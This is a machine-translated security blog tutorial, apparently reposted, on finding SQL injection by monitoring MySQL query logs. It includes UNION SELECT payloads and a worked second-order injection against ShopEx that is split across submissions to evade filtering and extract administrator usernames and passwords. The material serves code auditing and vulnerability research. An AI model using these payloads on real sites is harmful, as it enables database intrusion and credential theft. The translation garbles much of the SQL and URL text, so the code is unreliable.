Code auditing skills

0x01 injection vulnerability Overview

Injection is one of the most common security vulnerabilities in Web applications. Because some programs do not filter user input, attackers submit malicious SQL query statements to the server, after receiving the application, the attacker's input is incorrectly executed as part of the original SQL query statement. As a result, the original SQL query logic of the program is changed and the SQL query statement constructed by the attacker is executed, as a result, the injection vulnerability is generated.

Attackers can obtain sensitive information from the database through SQL injection, or execute a series of malicious operations such as adding users and exporting files using the database features. The risk of SQL Injection Vulnerabilities in common website construction systems is very high. This article will share with you about the SQL injection vulnerability mining methods. Other Web security vulnerabilities will not be discussed for the moment.

0x02 vulnerability mining ideas

We know that such SQL injection vulnerabilities are easily discovered in source code auditing, But what should we do if we do not have code auditing and want to dig vulnerabilities? We should pay attention to the methods. Here we will share with you some ideas on how to mine vulnerabilities.

First, a good test environment is very important, so that we can accurately find the injection location in a short time. Before digging for the injection vulnerability, we enable the MySQL Log query function. Because there is no injection, the log can be seen most intuitively.

Then use a Text View software to view the log file and open the SQL statement executed in the website Program (bare tail is used here)

The next step is to find the input point, which is the focus (this process also needs to carefully observe the MySQL query log ).

Some Input Point Information, the program does not filter and directly queries the database, resulting in injection,

For example, submit with get:

Http: // localhost/index2.php? Id = 1a

1	Http: // localhost/index2.php? Id = 1a

Follow 1A in the monitored MySQL Log, and Id = 1a appears here. It can be seen that this is not processed,

And it is an integer variable, and it is out of single quotes,

Then we can submit the URL to inject it and obtain any data information.

Http: // localhost/index2.php? Id = 1% 20 Union % 20 select % 20 USER % 28% 29% 20 from % 20 user

1	Http: // localhost/index2.php? Id = 1% 20 Union % 20 select % 20 USER % 28% 29% 20 from % 20 user

 

0x03 shopex vulnerability instance

Taking shopex vulnerability mining as an example, shopex is part of the source code encryption. decryption is complicated and involves too many files. It takes a lot of time to perform Code auditing. However, the above method can be used to easily identify vulnerabilities.

Open the website and log on to a product page. Click "add to Favorites" to view the post information. 75 is the ID of our product, which is also an Input Point.

We will change it to 74a and try it at one commit. Following the SQL log, we can see that the statement it runs is.

We can see that this area is not filtered, and 74a has been successfully written to the database. If it is not filtered during secondary fetch, it will cause injection. Then we will go to the member center page, this area will display our favorite items under normal operations.

In this case, you can check the database execution log and find that 74a has already appeared, so that there is a secondary injection.

Because this is a combination, we construct the injection statement and split and submit it to bypass the filter on the homepage.

Http: // localhost/index. php? Member-SQL-ajaxAddFav.html

1	Http: // localhost/index. php? Member-SQL-ajaxAddFav.html

We replace the preceding SQL statement with the following information and submit it three times:

0)/**/Union /**

1	0)/**/Union /**

**/Select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21, Concat (username, 0x7c, userpass), 26, listen, 29,30, 31,32, 33,34, 35,36, 37,38, 39,40, 41,42, 43,44, 45,46, 47,48, hour, minute, 57,58, 59,60, 61,62, 63,64, 65,66, 67,68, 69,70, 74, 80, 81 /**

1	**/Select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21, Concat (username, 0x7c, userpass), 26, listen, 29,30, 31,32, 33,34, 35,36, 37,38, 39,40, 41,42, 43,44, 45,46, 47,48, hour, minute, 57,58, 59,60, 61,62, 63,64, 65,66, 67,68, 69,70, 74, 80, 81 /**

**/From sdb_operatorslimit 1% 23

1	**/From sdb_operatorslimit 1% 23

Go to the member center page and view the Administrator information in the product favorites area.

Observe the database log and you can see that the SQL statement executed at this time is

Query select agoods. *, agimage. thumbnail from sdb_goods as agoods left joinsdb_gimages as agimage on agoods. image_default = agimage. gimage_id whereagoods. goods_id in (0)/**/Union/**, **/select1, 20, 21, concat (username, signature, userpass, 53,54, 55,56, 57,58, 59,60, 61,62, 63,64, 65,66, 67,68, 69,70, 71,72, 75,76, 77,78, 79,80, 81 /**, **/fromsdb_operators limit 1 #) limit 0, 10

1	Query select agoods. *, agimage. thumbnail from sdb_goods as agoods left joinsdb_gimages

0x04 Summary

The testing process of this semi-black box is:

Enable log query -- Query Input Point -- follow input information -- whether to use -- construct an injection statement

The focus in this process is to find the input point and follow the input information.

Input points are the entry points for our implementation of injection. We must effectively control these points to implement injection. These Input Points can include:

1)Form submission, mainly POST requests, and get requests.

2)URL parameter submission, mainly GET request parameters.

3)Cookie parameter submission.

4)Modifiable values in the HTTP Request Header, such as Referer and user_agent.

5)A few marginal input points, such as some file information of a .jpg file.

Some programs adopt some error processing, and even if the SQL query statement has an error, no error is reported. At this time, we can only monitor the SQL query log to judge, once the injection vulnerability is generated, it is first seen here.

You can use this method to find all the injection vulnerabilities in the program without understanding the code. You must be patient and careful.

Address: http://www.91ri.org/7818.html

Code auditing skills